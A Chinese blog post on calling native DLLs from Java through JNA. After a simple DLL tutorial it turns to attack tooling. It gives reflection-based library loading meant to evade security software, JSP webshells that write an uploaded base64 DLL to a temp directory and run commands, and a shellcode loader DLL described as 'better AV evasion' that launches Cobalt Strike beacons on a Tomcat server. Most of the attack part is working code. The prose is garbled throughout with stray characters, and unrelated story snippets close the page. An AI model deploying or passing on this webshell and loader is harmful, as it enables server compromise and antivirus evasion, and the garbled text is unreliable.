JNA 調(diào)用動(dòng)態(tài)鏈接庫(kù)學(xué)習(xí)

前言

聽(tīng)說(shuō)哥斯拉利用JNA技術(shù)實(shí)現(xiàn)了內(nèi)存加載exe询兴、執(zhí)行命令等操作嗜历,特來(lái)學(xué)習(xí)一下锅移。

JNA 基礎(chǔ)知識(shí)

JNA全稱:Java Native Access级历,是建立在JNI(Java Native Interface)技術(shù)之上的Java開(kāi)源框架互婿,JNA提供了一組Java工具類用于在運(yùn)行期間動(dòng)態(tài)訪問(wèn)的系統(tǒng)本地庫(kù)捣郊。
簡(jiǎn)單理解就是:JNA提供了一個(gè)"橋梁",可以利用Java代碼直接訪問(wèn)動(dòng)態(tài)鏈接庫(kù)中的函數(shù)慈参。

調(diào)用JNI接口

調(diào)用JNI接口的步驟為:

  • 創(chuàng)建工程呛牲,將dll文件放到工程下
  • 引入JNA相關(guān)的jar包
  • 創(chuàng)建繼承自Library類的接口
  • 接口中創(chuàng)建對(duì)象用于加載DLL/SO的類庫(kù)
  • 接口中聲明DLL/SO類庫(kù)頭文件中暴露的方法
  • 調(diào)用該方法

編譯DLL

以windows為例,使用Visual Studio 創(chuàng)建一個(gè)動(dòng)態(tài)鏈接庫(kù)的工程驮配,并定義一個(gè)頭文件testdll.h和源文件testdll.cpp娘扩。
簡(jiǎn)單實(shí)現(xiàn)一個(gè)SayHello的方法
創(chuàng)建testdll.cpp着茸,作用是用來(lái)實(shí)現(xiàn)被聲明的函數(shù)。

#include "pch.h"
#include "testdll.h"

void SayHello()
{
    std::cout << "Hello琐旁!你成功了涮阔!" << std::endl;
}

創(chuàng)建testdll.h頭文件,作用是用來(lái)聲明需要導(dǎo)出的函數(shù)接口

#pragma once
#include <iostream>

extern "C" __declspec(dllexport) void SayHello();
//聲明一個(gè)可被調(diào)用的函數(shù)“SayHello()”灰殴,它的返回類型是void敬特。
//extern "C"的作用是告訴編譯器將被它修飾的代碼按C語(yǔ)言的方式進(jìn)行編譯
//__declspec(dllexport),此修飾符告訴編譯器和鏈接器被它修飾的函數(shù)或變量需要從DLL導(dǎo)出

而后編譯出dll牺陶。
注意:要DLL位數(shù)要與JDK位數(shù)相同伟阔,否則無(wú)法調(diào)用。

image.png

導(dǎo)入JAR包

首先創(chuàng)建java工程掰伸,可以是普通項(xiàng)目也可以是maven功能皱炉。
maven 需要導(dǎo)入依賴

<dependency>
  <groupId>net.java.dev.jna</groupId>
  <artifactId>jna</artifactId>
  <version>5.13.0</version>
</dependency>
<dependency>
  <groupId>net.java.dev.jna</groupId>
  <artifactId>jna-platform</artifactId>
  <version>5.13.0</version>
</dependency>

普通工程可以在 https://github.com/java-native-access/jna 下載jna jar包和platform jar包并導(dǎo)入。

image.png

調(diào)用DLL

我們需要繼承Library類接口狮鸭,調(diào)用Native類的load方法將我們的testdll.dll加載進(jìn)來(lái)并轉(zhuǎn)換為本地庫(kù)娃承,而后聲明SayHello方法。

public interface Mydll extends Library {
    
    Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);
    void SayHello();
}

調(diào)用時(shí)不需要鏈接庫(kù)的后綴怕篷,會(huì)自動(dòng)加上历筝。
聲明SayHello方法時(shí),結(jié)合testdll.h頭文件廊谓,沒(méi)有返回值為void梳猪,也沒(méi)有需要的數(shù)據(jù)類型。(需要的話可查找JNA 數(shù)據(jù)類型對(duì)應(yīng)關(guān)系)

來(lái)源百度

然后在主方法里調(diào)用SayHello方法

public static void main(String[] args) {
    Mydll.mydll.SayHello();
}
image.png

可以看到成功調(diào)用了testdll.dll的SayHello方法蒸痹。

加載動(dòng)態(tài)鏈接庫(kù)

在上面的代碼中春弥,我們直接利用Native.load將dll轉(zhuǎn)換為本地庫(kù),在此之前缺少了加載這一步叠荠。
常見(jiàn)的加載動(dòng)態(tài)鏈接庫(kù)有三種方法:

  • System.load / System.loadLibrary
  • Runtime.getRuntime().load / Runtime.getRuntime().loadLibrary
  • com.sun.glass.utils.NativeLibLoader.loadLibrary

在使用時(shí)也有一些區(qū)別:load接收的是系統(tǒng)的絕對(duì)路徑匿沛,loadLibrary接收的是相對(duì)路徑。
但實(shí)際利用過(guò)程中肯定是絕對(duì)路徑優(yōu)先于相對(duì)路徑榛鼎。
以Runtime.getRuntime().load為例:

image.png

但實(shí)際利用可能會(huì)被安全軟件捕捉逃呼。我們反射調(diào)用loadLibrary方法。
代碼來(lái)自Java加載動(dòng)態(tài)鏈接庫(kù) 這篇文章

try {
    Class clazz = Class.forName("java.lang.ClassLoader");
    java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
    method.setAccessible(true);
    method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true);
    Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);
    mydll.SayHello();
}catch (Exception e){
    e.printStackTrace();
}

場(chǎng)景利用

現(xiàn)在我們想一下具體場(chǎng)景的利用者娱,在此基礎(chǔ)上調(diào)整我們的代碼抡笼。

webshell

既然jna加載動(dòng)態(tài)鏈接庫(kù)后轉(zhuǎn)換為本地庫(kù),可以調(diào)用dll的任意方法黄鳍,那實(shí)現(xiàn)一個(gè)命令執(zhí)行應(yīng)該也是可以的推姻。

#include "pch.h"
#include "command.h"

#include <cstdlib>
#include <string>

void executeCommand(const char* command) {
    char psBuffer[128];
    FILE* pPipe;

    if ((pPipe = _popen(command, "r")) == NULL)
    {
        exit(1);
    }

    while (fgets(psBuffer, 128, pPipe))
    {
        puts(psBuffer);
    }

    int endOfFileVal = feof(pPipe);
    int closeReturnVal = _pclose(pPipe);

    if (endOfFileVal)
    {
        printf("\nProcess returned %d\n", closeReturnVal);
    }
    else
    {
        printf("Error: Failed to read the pipe to the end.\n");
    }
}

相應(yīng)的頭文件

#pragma once
#include <iostream>

extern "C" __declspec(dllexport) void executeCommand(const char* command);

java代碼加載并調(diào)用。

import com.sun.jna.Library;
import com.sun.jna.Native;

public class test {

    public interface Mydll extends Library {
        void executeCommand(String command);
    }
    public static void main(String[] args) {
        try {
            Class clazz = Class.forName("java.lang.ClassLoader");
            java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
            method.setAccessible(true);
            method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true);
            Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);
            mydll.executeCommand("ipconfig");
        }catch (Exception e){
            e.printStackTrace();
        }

    }

}
image.png

成功實(shí)現(xiàn)框沟。結(jié)合實(shí)際利用我們還需要優(yōu)化一下代碼藏古,改成jsp腳本文件增炭。因?yàn)?code>com.sun.jna包是第三方包,在實(shí)際利用肯定沒(méi)有拧晕。所以這里選擇將自己寫(xiě)的代碼和jna.jar一塊用maven打包為maven02-1.0-SNAPSHOT-jar-with-dependencies.jar試試隙姿。

image.png

再把test類名修改為show,把dll動(dòng)態(tài)鏈接庫(kù)和將要執(zhí)行的命令作為參數(shù)傳遞進(jìn)去防症。
現(xiàn)在還差一個(gè)加載外部的jar包并調(diào)用方法的jsp腳本文件孟辑。

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>


<%
    String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";
    URLClassLoader urlClassLoader =null;
    Class<?> MyTest = null;
    //通過(guò)URLClassLoader加載外部jar
    urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});
    //獲取外部jar里面的具體類對(duì)象
    MyTest = urlClassLoader.loadClass("com.jna.jnatest");
    //創(chuàng)建對(duì)象實(shí)例
    Object instance = MyTest.newInstance();
    //獲取實(shí)例當(dāng)中的方法名為show
    Method method = MyTest.getMethod("show", String.class,String.class);
    //傳入實(shí)例以及方法參數(shù)信息執(zhí)行這個(gè)方法
    Object ada = method.invoke(instance, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll","whoami");
%>

這樣用的時(shí)候需要向目標(biāo)服務(wù)器手動(dòng)上傳兩個(gè)文件,jar包和dll文件蔫敲。我們?cè)龠M(jìn)一步優(yōu)化一下饲嗽。

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.net.URL" %>

<%!

    private String getFileName(){
        String fileName = "";
        java.util.Random random = new java.util.Random(System.currentTimeMillis());
        String os = System.getProperty("os.name").toLowerCase();
        if (os.contains("windows")){
            fileName = "C:\\Windows\\Temp\\" + random.nextInt(10000000) + ".dll";
        }else {
            fileName = "/tmp/"+ random.nextInt(10000000) + ".so";
        }
        return fileName;
    }


    public String UploadBase64DLL(String base64) throws Exception {
        sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder();
        java.io.File file = new java.io.File(getFileName());
        java.io.FileOutputStream fos = new java.io.FileOutputStream(file);
        fos.write(b.decodeBuffer(base64));
        fos.close();
        return file.getAbsolutePath();
    }
%>
<%
    try{
        String cmd = request.getParameter("cmd");
        String base64 = request.getParameter("base64");
        String file =  UploadBase64DLL(base64);
        String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";
        //通過(guò)URLClassLoader加載外部jar
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});
        //獲取外部jar里面的具體類對(duì)象
        Class<?> MyTest = urlClassLoader.loadClass("com.jna.jnatest");
        //創(chuàng)建對(duì)象實(shí)例
        Object instance = MyTest.newInstance();
        //獲取實(shí)例當(dāng)中的方法名為show,參數(shù)只有一個(gè)且類型為string的public方法
        Method method = MyTest.getMethod("show", String.class,String.class);
        //傳入實(shí)例以及方法參數(shù)信息執(zhí)行這個(gè)方法
        Object ada = method.invoke(instance, file,cmd);


    }
    catch (Exception e){
        out.println(e);
    }

%>

現(xiàn)在只需要手動(dòng)上傳一個(gè)jar包就可以奈嘿,dll通過(guò)base64編碼上傳上去貌虾。這樣參數(shù)值就是base64編碼之后的dll和cmd要執(zhí)行的系統(tǒng)命令。

image.png

唯一的缺點(diǎn)就是不能在前端顯示裙犹,或許將代碼加入到冰蝎可以實(shí)現(xiàn)尽狠?

shellcode

既然前端無(wú)法獲取結(jié)果,那直接加載shellcode上線cs呢叶圃?
我們利用同樣的方式寫(xiě)出加載shellcode的代碼袄膏。
shellcode.cpp

#include "shellcode.h"
#include <iostream>


using namespace std;

void shellcode(PCHAR code, DWORD buf_len) {
    
    cout << buf_len << endl;
    DWORD oldprotect = 0;
    LPVOID  base_addr = NULL;
    //  申請(qǐng)一塊buf_len長(zhǎng)度大小的空間,RW權(quán)限掺冠,不要開(kāi)rwx沉馆,PAGE_EXECUTE_READWRITE 
    base_addr = VirtualAlloc(0, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // 復(fù)制shellcode到新的空間,這個(gè)函數(shù)比較罕見(jiàn)德崭,用memcpy也可以呀
    unsigned char HexNumArray[4096];
    int num = HexStr2HexNum(code, buf_len, HexNumArray);
    RtlMoveMemory(base_addr, HexNumArray, buf_len);
    // 修改為執(zhí)行RX權(quán)限
    VirtualProtect(base_addr, buf_len, PAGE_EXECUTE_READ, &oldprotect);
    cout << "starting spawn shellcode" << endl;
    // 當(dāng)前進(jìn)程創(chuàng)建線程執(zhí)行shellcode
    auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0);
    // 等待線程返回值
    WaitForSingleObject(ct, -1);
    // 釋放內(nèi)存
    free(base_addr);
}

int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray)
{
    int j = 0;
    for (int i = 0; i < len; i += 2)
    {
        if (HexStrArray[i] == 0x5C || HexStrArray[i] == 0x58 || HexStrArray[i] == 0x78)
        {
            continue;
        }
        char HIGH_BYTE = 0;
        char LOW_BYTE = 0;
        //high 4
        if (HexStrArray[i] >= 0x30 && HexStrArray[i] <= 0x3A)
        {
            HIGH_BYTE = HexStrArray[i] - 0x30;
        }
        else if (HexStrArray[i] >= 0x41 && HexStrArray[i] <= 0x47)
        {
            HIGH_BYTE = HexStrArray[i] - 0x37;
        }
        else if (HexStrArray[i] >= 0x61 && HexStrArray[i] <= 0x67)
        {
            HIGH_BYTE = HexStrArray[i] - 0x57;
        }
        else
        {
            printf("Please make sure the format of Hex String is correct!\r\n");
            printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i);
            return -1;
        }

        //low 4
        if (HexStrArray[i + 1] >= 0x30 && HexStrArray[i + 1] <= 0x3A)
        {
            LOW_BYTE = HexStrArray[i + 1] - 0x30;
        }
        else if (HexStrArray[i + 1] >= 0x41 && HexStrArray[i + 1] <= 0x47)
        {
            LOW_BYTE = HexStrArray[i + 1] - 0x37;
        }
        else if (HexStrArray[i + 1] >= 0x61 && HexStrArray[i + 1] <= 0x67)
        {
            LOW_BYTE = HexStrArray[i + 1] - 0x57;
        }
        else
        {
            printf("Please make sure the format of Hex String is correct!\r\n");
            printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i);
            return -1;
        }

        HexNumArray[j] &= 0x0F;
        HexNumArray[j] |= (HIGH_BYTE << 4);
        HexNumArray[j] &= 0xF0;
        HexNumArray[j] |= LOW_BYTE;
        j++;
    }
    return 0;
}

shellcode.h

#pragma once
#include <Windows.h>


extern "C" __declspec(dllexport) BOOL shellcode(PCHAR code, DWORD size);
int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray);

在java里加載并調(diào)用斥黑,傳入shellcode和長(zhǎng)度。以達(dá)到更好的免殺性眉厨。


import java.util.Base64;
import com.sun.jna.Library;
import com.sun.jna.Native;


public class test {
    
    public interface Mydll extends Library {
        void shellcode(byte[] b,int length);
    }

    public static void show(String base64,String dllpath,String dllname) {
        try {
            Class clazz = Class.forName("java.lang.ClassLoader");
            java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
            method.setAccessible(true);
            method.invoke(null, clazz, dllpath, true);
            Mydll mydll = (Mydll)Native.load(dllname,Mydll.class);
            byte[] base64decodedBytes = java.util.Base64.getDecoder().decode(base64);
            int leng = base64decodedBytes.length;
            mydll.shellcode(base64decodedBytes,leng);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    
    public static void main(String[] args) {
        String base64encodedString = "XHhmY1x4NDhxxxxxxxxxxxxxxx";
        show(base64encodedString,"C:\\Windows\\Temp\\jna.dll","jna");
    }
}

此時(shí)只需要將shellcode值base64編碼當(dāng)做字符傳遞即可锌奴。測(cè)試一下

image.png

可以看到正常上線,進(jìn)程為javaw.exe憾股。
那在實(shí)際環(huán)境中同樣不能這樣利用鹿蜀。依舊把java代碼打包為jar包,再修改一下jsp腳本文件應(yīng)該就可以在實(shí)際運(yùn)行了荔燎。

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.net.URL" %>

<%!

    private String getFileName(String dllname){
        String fileName = "";
        String os = System.getProperty("os.name").toLowerCase();
        if (os.contains("windows")){
            fileName = "C:\\Windows\\Temp\\" + dllname + ".dll";
        }else {
            fileName = "/tmp/"+ dllname + ".so";
        }
        return fileName;
    }


    public String UploadBase64DLL(String base64,String dllname) throws Exception {
        sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder();
        java.io.File file = new java.io.File(getFileName(dllname));
        java.io.FileOutputStream fos = new java.io.FileOutputStream(file);
        fos.write(b.decodeBuffer(base64));
        fos.close();
        return file.getAbsolutePath();
    }
%>
<%
    try{

        String shellcode = request.getParameter("shellcode");
        String base64dll = request.getParameter("base64dll");
        String dllname = request.getParameter("dllname");
        String pathdll = UploadBase64DLL(base64dll,dllname);
        String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});
        Class<?> MyTest = urlClassLoader.loadClass("com.jna.jnatest");
        Object instance = MyTest.newInstance();
        Method method = MyTest.getMethod("show", String.class,String.class,String.class);
        Object ada = method.invoke(instance,shellcode, pathdll,dllname);

    }
    catch (Exception e){
        out.println(e);
    }

%>

以tomcat為例耻姥,shellcode 即將cobaltstrike的shellcode進(jìn)行base64編碼,base64dll 是base64編碼dll動(dòng)態(tài)鏈接庫(kù)之后的值有咨,dllname即是dll動(dòng)態(tài)鏈接庫(kù)的名稱。
測(cè)試可以正常上線執(zhí)行命令蒸健。上線進(jìn)程為java.exe座享。

image.png

總結(jié)

在學(xué)習(xí)JNA調(diào)用動(dòng)態(tài)鏈接庫(kù)的時(shí)候婉商,借鑒了很多師傅的思路,但無(wú)奈趕不上師傅們的高度渣叛,只能用稍微復(fù)雜點(diǎn)的辦法完善自己的代碼丈秩,來(lái)曲折得實(shí)現(xiàn)效果。
如果簡(jiǎn)單高效的利用還是選擇哥斯拉或者傾旋師傅的j2osWin

參考資料

https://www.bilibili.com/video/BV16t411A7it/?spm_id_from=333.337.search-card.all.click&vd_source=0627d2723fb97773126096556cc98e0d
https://www.cnblogs.com/happyhuangjinjin/p/17219986.html
https://tttang.com/archive/1436/
https://payloads.online/archivers/2022-08-11/1/

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末淳衙,一起剝皮案震驚了整個(gè)濱河市蘑秽,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌箫攀,老刑警劉巖肠牲,帶你破解...
    沈念sama閱讀 217,277評(píng)論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異靴跛,居然都是意外死亡缀雳,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,689評(píng)論 3 393
  • 文/潘曉璐 我一進(jìn)店門(mén)梢睛,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)肥印,“玉大人,你說(shuō)我怎么就攤上這事绝葡∩罴睿” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,624評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵藏畅,是天一觀的道長(zhǎng)敷硅。 經(jīng)常有香客問(wèn)我,道長(zhǎng)墓赴,這世上最難降的妖魔是什么竞膳? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,356評(píng)論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮诫硕,結(jié)果婚禮上坦辟,老公的妹妹穿的比我還像新娘。我一直安慰自己章办,他們只是感情好锉走,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,402評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著藕届,像睡著了一般挪蹭。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上休偶,一...
    開(kāi)封第一講書(shū)人閱讀 51,292評(píng)論 1 301
  • 那天梁厉,我揣著相機(jī)與錄音,去河邊找鬼。 笑死词顾,一個(gè)胖子當(dāng)著我的面吹牛八秃,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播肉盹,決...
    沈念sama閱讀 40,135評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼昔驱,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了上忍?” 一聲冷哼從身側(cè)響起骤肛,我...
    開(kāi)封第一講書(shū)人閱讀 38,992評(píng)論 0 275
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎窍蓝,沒(méi)想到半個(gè)月后腋颠,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,429評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡它抱,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,636評(píng)論 3 334
  • 正文 我和宋清朗相戀三年秕豫,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片观蓄。...
    茶點(diǎn)故事閱讀 39,785評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡混移,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出侮穿,到底是詐尸還是另有隱情歌径,我是刑警寧澤,帶...
    沈念sama閱讀 35,492評(píng)論 5 345
  • 正文 年R本政府宣布亲茅,位于F島的核電站回铛,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏克锣。R本人自食惡果不足惜茵肃,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,092評(píng)論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望袭祟。 院中可真熱鬧验残,春花似錦、人聲如沸巾乳。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,723評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)胆绊。三九已至氨鹏,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間压状,已是汗流浹背仆抵。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,858評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人肢础。 一個(gè)月前我還...
    沈念sama閱讀 47,891評(píng)論 2 370
  • 正文 我出身青樓还栓,卻偏偏與公主長(zhǎng)得像碌廓,于是被迫代替她去往敵國(guó)和親传轰。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,713評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容